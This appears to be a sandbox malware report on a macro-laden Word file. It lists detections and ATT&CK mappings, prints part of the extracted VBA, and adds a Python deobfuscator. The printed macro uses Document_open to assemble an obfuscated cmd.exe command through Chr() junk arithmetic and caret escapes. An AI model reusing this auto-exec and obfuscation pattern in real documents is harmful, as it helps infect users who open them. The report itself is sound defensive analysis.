Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
Note: none of the findings below evidences a software vulnerability being exploited. What the artifacts show is macro code that runs once the user enables content, which ATT&CK files under T1204.002 User Execution: Malicious File rather than T1203; treat the T1203 mapping as unsupported by this report.
The sample carries a VBA project whose Document_open handler runs as soon as the document is opened with macros enabled. The visible source is padded with junk arithmetic on variables that are never assigned (harmless under On Error Resume Next) and builds a command line out of short string literals and Chr() calls whose only meaningful term is the numeric constant: 109 decodes to "m", 99 to "c" and 34 to a double quote, so the visible fragments spell out c + md /c ^f^O^r ... /^F ... "tokens= 2 delims=EFHMN..., a caret-obfuscated cmd.exe FOR /F loop. The assembled string is handed to Application.Run("FqLHmmC", ...), a macro that is outside the shown preview; the Shell() call flagged by OLE_VBA_SHELL and the shell/download/object-execution tokens found in the compiled p-code are what support the assessment that the macro launches a second-stage payload. ClamAV independently detects the file as Doc.Malware.Dbor-6615926-0.
Heuristics (6)
- [critical] CLAMAV_DETECTION: ClamAV: Doc.Malware.Dbor-6615926-0. ClamAV detected this file as malware: Doc.Malware.Dbor-6615926-0.
- [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings). Document contains VBA macro code.
- [critical] OLE_VBA_SHELL: Shell() call in VBA.
- [high] OLE_VBA_DOCOPEN: Document_Open macro.
- [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- [info] EMBEDDED_URL: Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). Caveat: this is the standard DrawingML XML namespace URI that appears in ordinary Office documents; it is not an indicator of compromise and should not be blocked or pivoted on.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35985 bytes | f7bfe0d191f4ecae78b4aa99807106781055980802ba53eda7cf4bb4de16c53b |

Preview (first 1,000 lines of the extracted script; the page cuts it off earlier than that):
Attribute VB_Name = "zVtbHGBBuwQzuP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SojsjdivQGKP()
jGhhW = 22767 / 3786 - 83672 * AzODPJ / csBaV * sYTBR / 16147 / MiYWzV * 81390 - fXHWma
sMjoUG = 39030 / 12780 - 73626 * mUzwFH / lAipAm * oFDFzf / 25400 / TYdBPH * 33906 - RhYZBQ
bwLpi = 58861 / 12762 - 41299 * QRBzcp / zVERaF * iEEBK / 19654 / wRvKrw * 22481 - vwzmP
iPVTD = 51948 / 44188 - 12263 * dLBTa / IuLsfR * QWNvv / 72410 / lnKPn * 72153 - EoONSX
QulDnu = 59400 / 45420 - 65515 * tUoEQ / lZzXp * SwXpZ / 51206 / HAqlk * 99620 - zaiDG
jAmKu = 70116 / 65283 - 4859 * jVucla / wLsTAF * lqUzZI / 34375 / pdOUDO * 208 - HOOSi
End Function
Private Sub Document_open()
On Error Resume Next
OAcJcz = 12920 - CtZaTA * UsJwh / Dqmfq * sUiWf * 23970 + rMHNu * WziGiP - 60014 * 45646 - (isLkm + 29845 + Jpimn * WYWtN)
BfjlKw = 76812 - dEwwH * DsKzPN / XiZZQO * CqcfTf * 5128 + vYZqOR * wUQnhY - 5255 * 58956 - (VBqdw + 12201 + ujpEm * Qccwaw)
ZwTnmF = 15999 - jZAMCK * pYfpM / GYMwTD * LkzGsz * 92135 + WqKAE * DPEaZ - 11773 * 19912 - (XvGauT + 50918 + oSCTR * ctTDOO)
sZKOdRvmJqX = Application.Run("FqLHmmC", "" + NfPDKUVk + KmjqmLvZz + CVar("c") + RiHEHcK + CZOBQNvjbvpZl + bMttTl + uVizaDMhJZ + aAPibnzRN + qjrRzqij + vPPrPHzEtf + EUjFaQrI + vISjvwwh + cVfqXs + XoBEowKJ + RrsYvAj + NpisSisW + qnCaq + ljiPJQowt + zOOXN + RTVzQW + pHNDIIYuzi + CzSEccOBs)
AHnKGW = 83811 - TpaRSh * RzQXF / siZuBw * mEjcrX * 25110 + UzRYFi * XchzX - 24616 * 20585 - (kUsvI + 46371 + QEXFJ * JzavU)
BzzzGn = 22011 - MCbZbo * HwbEYG / MAAZoO * GEDtNN * 72007 + toUMQ * Cwjhb - 26166 * 80888 - (TPvpUm + 98639 + jwzTFz * fNaKn)
End Sub
Function LqdKETrNAoik()
zZBOX = 91371 - EHcHp * HKWmH / tEKjMZ * GPnzDd * 36540 + bfiDw * MMwtWp - 53454 * 17307 - (nJcuSO + 73905 + oovovQ * ZiWjf)
XtwVuH = 40876 - zzEYA * ADCYj / jzqcvf * lwfbNj * 65525 + hLRJfP * tjFfSX - 25481 * 94608 - (GEJNYC + 43588 + OSkSRV * pSdSsk)
muziv = 29206 - ALnbo * fsTiS / CDPQT * fPCEbI * 30522 + PGrFL * PzvnI - 58558 * 83158 - (FfSUX + 43641 + EWifj * zKvjf)
jLIhsN = 79458 - jzzZAq * iAKooq / AnQvo * sTsdL * 90491 + QmlWY * wEvrV - 31236 * 34265 - (vVZrpC + 39477 + UQwZV * QHUOFQ)
uwnoht = 20212 - KDJib * hGBHY / LPorq * niiYiX * 54090 + ENzOMZ * QAbqiw - 24065 * 80255 - (smEtS + 58687 + wwvFj * lYlCqw)
OnFKX = 30076 - RXztV * ZURfo / vMfdbK * qztuF * 770 + CvaSrz * BBMTY - 1736 * 66700 - (wMnDt + 37011 + jKiAJZ * Xdutd)
End Function
Function nQnrKEwvf()
RSOPH = 96742 - MSzqVR * jnwii / jkvBYp * pAIIaD * 17400 + LZNhw * JXdNlX - 60905 * 8003 - (LoXqk + 62919 + MrRDG * KqPSI)
wzTlV = 86452 - GRUZz * AooWHK / ozGla * KKFYV * 33057 + zASoi * MLEiuO - 33297 * 14539 - (VQZnUV + 64858 + rhLTiu * szIwh)
GZatw = 84877 - FaWiwB * lllOSs / TvlvZV * bWOqtN * 52385 + SfYCbZ * fizdJ - 35004 * 53648 - (tZWind + 78230 + ZWqdDH * CnIJTF)
IZBTZ = 90627 - VzPKrs * uFKtGW / jCGQu * tNFlR * 75711 + KlNvXz * uqEOpp - 78135 * 44373 - (IjiBtY + 44544 + CifCIu * sENRIs)
AoOwp = 69355 - LXJuT * ozhwhR / bGXYi * DmuFU * 51054 + AQlZWf * djKBZO - 11730 * 22687 - (SLPPwu + 87613 + pTZji * RoTdo)
End Function
Attribute VB_Name = "kzjWWNRom"
Function bMttTl()
On Error Resume Next
JtkCl = 19313 * 80246 - 52352 + hmSSRA * fjvqzo * 58377
fYjEbEPn = CStr(Chr(MUPEDaVanoM + nsKwYcJwcsr + 109 + KrINhFiKol + ELQcjHmD)) + "d /" + CStr(Chr(pBbYXAdkbX + QiSaGGdTzGj + 99 + QsUtlFiLmB + JhhjEKCpXvmK)) + " ^f^O" + "^r ;" + " " + "; " + "/^F , " + "; "
oDLQzH = 2561 + nMvisO * ujlszh / tmHwSd + UPZMHV / PdjfRW / ovzohJ - FsSsw * 83005 * ZJBoY - 42579 * zWWls + 90978 - GBNjLT
VvDGQwj = " " + CStr(Chr(farYjRm + HJqqSjUi + 34 + nzYwnuwj + VGJklaIUNSpzFb)) + " t" + "oke" + "ns= " + " 2 " + "d" + "eli" + CStr(Chr(OUkFDRKzVC + EinknHlBzGF + 109 + AQJVnrzWQfc + tEvKOiUdQifEM)) + "s" + "=EFH" + "MN" + CStr(Chr(YWIOsiDAAdhLI + wKouNhGpr
... (truncated)
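The string assembly seen in bMttTl above can be undone mechanically. What follows is an added Python example written for this page, not a tool from the report or from the analyzer that produced it. It runs on a constructed excerpt that copies the two string-building statements visible in the preview (the VvDGQwj line is cut at "MN", where the page truncates), and it assumes, as the macro's own shape suggests, that the identifiers inside Chr() are never assigned anywhere in the project (Empty Variants, which count as 0 in VBA arithmetic) and that `^` is a cmd.exe escape character. The names eval_chr_arg, reassemble, extract_strings, unescape_cmd and recover_command_line are this example's own.

```python
import re

# Constructed excerpt (not the full extracted macro): the two string-building
# statements visible in the report's preview, inside the function that holds them.
# The second statement is cut at "MN" because the report's preview truncates there.
SAMPLE_VBA = r'''
Function bMttTl()
On Error Resume Next
JtkCl = 19313 * 80246 - 52352 + hmSSRA * fjvqzo * 58377
fYjEbEPn = CStr(Chr(MUPEDaVanoM + nsKwYcJwcsr + 109 + KrINhFiKol + ELQcjHmD)) + "d /" + CStr(Chr(pBbYXAdkbX + QiSaGGdTzGj + 99 + QsUtlFiLmB + JhhjEKCpXvmK)) + " ^f^O" + "^r ;" + " " + "; " + "/^F , " + "; "
VvDGQwj = " " + CStr(Chr(farYjRm + HJqqSjUi + 34 + nzYwnuwj + VGJklaIUNSpzFb)) + " t" + "oke" + "ns= " + " 2 " + "d" + "eli" + CStr(Chr(OUkFDRKzVC + EinknHlBzGF + 109 + AQJVnrzWQfc + tEvKOiUdQifEM)) + "s" + "=EFH" + "MN"
End Function
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# One token per string fragment: a VBA literal ("" escapes a quote) or a Chr() call,
# optionally wrapped in CStr(...). Everything else (+, junk identifiers) is skipped.
TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'
    r'|(?:CStr\s*\()?\s*Chr\s*\(([^()]*)\)',
    re.IGNORECASE,
)
TERM = re.compile(r'([+-]?)\s*([A-Za-z_]\w*|\d+)')


def eval_chr_arg(expr):
    """Evaluate a Chr() argument of the form junk + junk + 109 + junk.

    Assumption: the junk identifiers are never assigned anywhere in the project
    (no Option Explicit), so they are Empty Variants and count as 0, and only the
    integer literals contribute. If a sample does assign them, resolve their
    values instead of dropping them.
    """
    total = 0
    for sign, term in TERM.findall(expr):
        if term.isdigit():
            total += -int(term) if sign == '-' else int(term)
    return total


def reassemble(rhs):
    """Concatenate the string fragments of one right-hand side, in source order."""
    parts = []
    for m in TOKEN.finditer(rhs):
        if m.group(1) is not None:
            parts.append(m.group(1).replace('""', '"'))
        else:
            code = eval_chr_arg(m.group(2))
            if not 0 <= code <= 255:
                raise ValueError(f'Chr({code}) is out of range; an identifier is probably not Empty')
            parts.append(chr(code))
    return ''.join(parts)


def extract_strings(vba_source):
    """Map each variable that receives string fragments to its decoded value.

    Pure-arithmetic junk assignments contain no fragments and are dropped.
    """
    decoded = {}
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        value = reassemble(rhs)
        if value:
            decoded[name] = value
    return decoded


def unescape_cmd(text):
    """Remove cmd.exe caret escapes: ^X means the literal character X."""
    return re.sub(r'\^(.)', r'\1', text)


def recover_command_line(vba_source):
    """Join the decoded fragments in source order and strip the carets."""
    return unescape_cmd(''.join(extract_strings(vba_source).values()))


if __name__ == '__main__':
    for name, value in extract_strings(SAMPLE_VBA).items():
        print(f'{name} = {value!r}')
    # The leading "c" of "cmd" comes from CVar("c") in the Document_open
    # Application.Run argument list, not from this function.
    print('c' + recover_command_line(SAMPLE_VBA))
```

On the excerpt this yields `md /c fOr ; ; /F , ;  " tokens=  2 delims=EFHMN`, and with the `CVar("c")` prefix from Document_open the familiar `cmd /c for /F "tokens=2 delims=..."` shape is visible. Two limits matter on a full sample: fragments are joined here in source order, whereas the real order is fixed by the operand list of the Application.Run argument, so follow that list when reconstructing the complete command; and the Empty-Variant assumption must be re-checked whenever a Chr() term is assigned anywhere in the project.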